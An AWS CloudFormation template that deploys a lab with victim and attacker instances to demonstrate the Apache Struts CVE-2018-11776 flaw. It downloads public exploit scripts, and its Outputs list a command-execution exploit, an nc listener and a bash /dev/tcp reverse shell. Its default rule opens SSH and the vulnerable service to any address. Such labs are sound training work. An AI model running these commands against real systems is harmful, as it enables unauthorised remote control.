AWSTemplateFormatVersion: 2010-09-09
Description: Demo lab for Apache Struts vulnerability (cve-2018-11776)
Parameters:
  TagKey:
    Type: String
    Default: Name
  TagValue:
    Type: String
    Default: cve-2018-11776-struts2-demo
  VpcCidr:
    Type: String
    Description: CIDR block for the demo exploit network
    Default: 10.0.0.0/16
  PublicSubnetCidr:
    Type: String
    Description: Public subnet
    Default: 10.0.1.0/24
  AdminCidr:
    Description: >-
      IP address(es) which are allowed to SSH in
    Type: String
    Default: 0.0.0.0/0
  Ec2KeyName:
    Type: AWS::EC2::KeyPair::KeyName
    Description: >-
      Name of an existing EC2 KeyPair to enable SSH access to the instances
  InstanceType:
    Description: EC2 instance type
    Type: String
    Default: t2.small
  Linux2Ami:
    Type: AWS::EC2::Image::Id
    Description: Linux2 AMI

Resources:
  Vpc:
    Type: AWS::EC2::VPC
    Properties:
      CidrBlock: !Ref VpcCidr
      EnableDnsHostnames: true
      EnableDnsSupport: true
      Tags:
        - Key: !Ref TagKey
          Value: !Ref TagValue

  PublicSubnet:
    Type: AWS::EC2::Subnet
    Properties:
      CidrBlock: !Ref PublicSubnetCidr
      MapPublicIpOnLaunch: true
      VpcId: !Ref Vpc
      Tags:
        - Key: !Ref TagKey
          Value: !Ref TagValue

  InternetGateway:
    Type: AWS::EC2::InternetGateway
    Properties:
      Tags:
        - Key: !Ref TagKey
          Value: !Ref TagValue

  VpcGatewayAttachment:
    Type: AWS::EC2::VPCGatewayAttachment
    Properties:
      VpcId: !Ref Vpc
      InternetGatewayId: !Ref InternetGateway

  PublicRouteTable:
    Type: AWS::EC2::RouteTable
    Properties:
      VpcId: !Ref Vpc

  InternetRoute:
    Type: AWS::EC2::Route
    DependsOn: VpcGatewayAttachment
    Properties:
      DestinationCidrBlock: 0.0.0.0/0
      GatewayId: !Ref InternetGateway
      RouteTableId: !Ref PublicRouteTable

  PublicSubnetRouteTableAssociation:
    Type: AWS::EC2::SubnetRouteTableAssociation
    Properties:
      RouteTableId: !Ref PublicRouteTable
      SubnetId: !Ref PublicSubnet

  PublicSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      GroupName: !Sub "${TagValue}"
      GroupDescription: !Sub "SG for ${TagValue}"
      VpcId: !Ref Vpc
      SecurityGroupIngress:
        - IpProtocol: tcp
          FromPort: 22
          ToPort: 22
          CidrIp: !Ref AdminCidr
        - IpProtocol: tcp
          FromPort: 8080
          ToPort: 8080
          CidrIp: !Ref AdminCidr
        - IpProtocol: icmp
          FromPort: -1
          ToPort: -1
          CidrIp: !Ref AdminCidr
      SecurityGroupEgress:
        - IpProtocol: -1
          CidrIp: 0.0.0.0/0

  IntraPublicSecurityGroupIngress:
    Type: AWS::EC2::SecurityGroupIngress
    DependsOn: PublicSecurityGroup
    Properties:
      GroupId: !Ref PublicSecurityGroup
      IpProtocol: -1
      ToPort: -1
      SourceSecurityGroupId: !Ref PublicSecurityGroup

  VictimInstance:
    Type: AWS::EC2::Instance
    Properties:
      ImageId: !Ref Linux2Ami
      InstanceType: !Ref InstanceType
      KeyName: !Ref Ec2KeyName
      SubnetId: !Ref PublicSubnet
      SecurityGroupIds:
        - !Ref PublicSecurityGroup
      UserData:
        Fn::Base64: !Sub |
          #!/bin/bash
          yum update -y
          amazon-linux-extras install -y docker
          usermod -a -G docker ec2-user
          systemctl enable docker
          systemctl restart docker
          docker run -d --name struts2 -p 32771:8080 oznetnerd/cve-2018-11776-struts2
      Tags:
        - Key: !Ref TagKey
          Value: !Sub
            - "Victim-${TagVal}"
            - { TagVal: !Ref TagValue }

  AttackerInstance:
    Type: AWS::EC2::Instance
    Properties:
      ImageId: !Ref Linux2Ami
      InstanceType: !Ref InstanceType
      KeyName: !Ref Ec2KeyName
      SubnetId: !Ref PublicSubnet
      SecurityGroupIds:
        - !Ref PublicSecurityGroup
      UserData:
        Fn::Base64: !Sub |
          #!/bin/bash
          yum update -y
          yum install -y python3-pip python3 python3-setuptools nmap-ncat
          pip3 install requests
          mkdir /home/ec2-user
          cd /home/ec2-user
          wget https://raw.githubusercontent.com/hook-s3c/CVE-2018-11776-Python-PoC/master/exploitS2-057-test.py
          wget https://raw.githubusercontent.com/hook-s3c/CVE-2018-11776-Python-PoC/master/exploitS2-057-cmd.py
      Tags:
        - Key: !Ref TagKey
          Value: !Sub
            - "Attacker-${TagVal}"
            - { TagVal: !Ref TagValue }

Outputs:
  VictimPublicIp:
    Value: !GetAtt VictimInstance.PublicIp
    Export:
      Name: !Sub "${AWS::StackName}-VictimPublicIp"
  AttackerPublicIp:
    Value: !GetAtt AttackerInstance.PublicIp
    Export:
      Name: !Sub "${AWS::StackName}-AttackerPublicIp"
  CheckVuln:
    Value: !Sub
      - "python3 exploitS2-057-test.py http://${VicIp}:32771/showcase.action"
      - { VicIp: !GetAtt VictimInstance.PrivateIp }
    Export:
      Name: !Sub "${AWS::StackName}-CheckVuln"
  RunExploit:
    Value: !Sub
      - "python exploitS2-057-cmd.py ${VicIp}:32771 'id'"
      - { VicIp: !GetAtt VictimInstance.PrivateIp }
    Export:
      Name: !Sub "${AWS::StackName}-RunExploit"
  AcceptReverseShell:
    Value: nc -lvp 31337
    Export:
      Name: !Sub "${AWS::StackName}-AcceptReverseShell"
  RunReverseShell:
    Value: !Sub
      - 'python exploitS2-057-cmd.py ${VicIp}:32771 "/bin/bash -i >& /dev/tcp/${AttackIp}/31337 0>&1"'
      - { VicIp: !GetAtt VictimInstance.PrivateIp, AttackIp: !GetAtt AttackerInstance.PrivateIp}
    Export:
      Name: !Sub "${AWS::StackName}-RunReverseShell"